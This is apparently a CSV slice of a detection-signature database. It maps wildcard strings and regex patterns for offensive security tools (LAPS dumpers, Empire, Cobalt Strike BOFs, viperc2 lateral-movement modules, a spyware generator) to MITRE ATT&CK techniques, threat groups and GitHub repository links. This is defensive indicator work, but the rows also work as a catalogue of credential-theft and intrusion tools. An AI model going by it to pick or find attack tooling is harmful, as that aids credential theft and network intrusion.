"*LANMAN password IS however set. Will now install new password as NT pass instead*",".{0,1000}LANMAN\spassword\sIS\showever\sset\.\sWill\snow\sinstall\snew\spassword\sas\sNT\spass\sinstead.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50787"
"*LANs.py*",".{0,1000}LANs\.py.{0,1000}","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","N/A","10","2599","489","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z","50788"
"*lanscan_arp.py*",".{0,1000}lanscan_arp\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","50789"
"*laps_dump*",".{0,1000}laps_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50793"
"*LapsAllowedAdminGroups.txt*",".{0,1000}LapsAllowedAdminGroups\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50794"
"*LAPSDecrypt.*",".{0,1000}LAPSDecrypt\..{0,1000}","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50795"
"*Lapsdump.cna*",".{0,1000}Lapsdump\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","50796"
"*Lapsdump.exe*",".{0,1000}Lapsdump\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","50797"
"*LAPSDumper-main*",".{0,1000}LAPSDumper\-main.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","50798"
"*LapsPasswords.txt*",".{0,1000}LapsPasswords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50799"
"*LAPSToolkit*",".{0,1000}LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50800"
"*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","50801"
"*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50802"
"*LaresLLC/SlinkyCat*",".{0,1000}LaresLLC\/SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","50803"
"*LasCC/Hack-Tools*",".{0,1000}LasCC\/Hack\-Tools.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","50804"
"*LastenPIC/SpiderPIC*",".{0,1000}LastenPIC\/SpiderPIC.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50805"
"*LastenServer server *",".{0,1000}LastenServer\sserver\s.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50806"
"*Lastenzug - PIC Socks4a proxy by @invist*",".{0,1000}Lastenzug\s\-\sPIC\sSocks4a\sproxy\sby\s\@invist.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","50807"
"*lastpass.x86*",".{0,1000}lastpass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50808"
"*lastpass/process_lp_files.py*",".{0,1000}lastpass\/process_lp_files\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50809"
"*lastpass_sniffed_fmt_plug*",".{0,1000}lastpass_sniffed_fmt_plug.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50810"
"*lastpass2john.py*",".{0,1000}lastpass2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50811"
"*Lateral/DCom.cs*",".{0,1000}Lateral\/DCom\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50812"
"*Lateral/PSExec.cs*",".{0,1000}Lateral\/PSExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50813"
"*Lateral/SMBClient.cs*",".{0,1000}Lateral\/SMBClient\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50814"
"*Lateral/SMBClientDelete.cs*",".{0,1000}Lateral\/SMBClientDelete\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50815"
"*Lateral/SMBClientGet.cs*",".{0,1000}Lateral\/SMBClientGet\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50816"
"*Lateral/SMBClientPut.cs*",".{0,1000}Lateral\/SMBClientPut\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50817"
"*Lateral/WMIExec.cs*",".{0,1000}Lateral\/WMIExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","50818"
"*lateral_wmi.py*",".{0,1000}lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50819"
"*LateralMovement_*_Exploit*.py",".{0,1000}LateralMovement_.{0,1000}_Exploit.{0,1000}\.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50820"
"*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50821"
"*LateralMovement_ExploitationOfRemoteServices_MS17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_MS17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50822"
"*LateralMovement_Other_Ladon.py*",".{0,1000}LateralMovement_Other_Ladon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50823"
"*LateralMovement_PassTheHash_ByInvokeWMIExec.py*",".{0,1000}LateralMovement_PassTheHash_ByInvokeWMIExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50824"
"*LateralMovement_PassTheHash_ByWmi.py*",".{0,1000}LateralMovement_PassTheHash_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50825"
"*LateralMovement_PassTheTicket_ByPsexec.py*",".{0,1000}LateralMovement_PassTheTicket_ByPsexec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50826"
"*LateralMovement_PassTheTicket_BySharpwmi.py*",".{0,1000}LateralMovement_PassTheTicket_BySharpwmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50827"
"*LateralMovement_PassTheTicket_ByWmi.py*",".{0,1000}LateralMovement_PassTheTicket_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","50828"
"*Laudanum PHP File Browser*",".{0,1000}Laudanum\sPHP\sFile\sBrowser.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50829"
"*Laudanum PHP Hostname by IP Lookup*",".{0,1000}Laudanum\sPHP\sHostname\sby\sIP\sLookup.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50830"
"*Laudanum PHP Proxy*",".{0,1000}Laudanum\sPHP\sProxy.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50831"
"*Laudanum PHP Shell Access*",".{0,1000}Laudanum\sPHP\sShell\sAccess.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","50832"
"*Launch Empire CLI*",".{0,1000}Launch\sEmpire\sCLI.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50833"
"*Launch Empire Server*",".{0,1000}Launch\sEmpire\sServer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50834"
"*launch4j launch4j/sAINT.xml*",".{0,1000}launch4j\slaunch4j\/sAINT\.xml.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50836"
"*LaunchExploitMode.ps1*",".{0,1000}LaunchExploitMode\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","50838"
"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*",".{0,1000}LAUNCHING\sGPODDITY\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPO\sREQUESTS.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","50839"
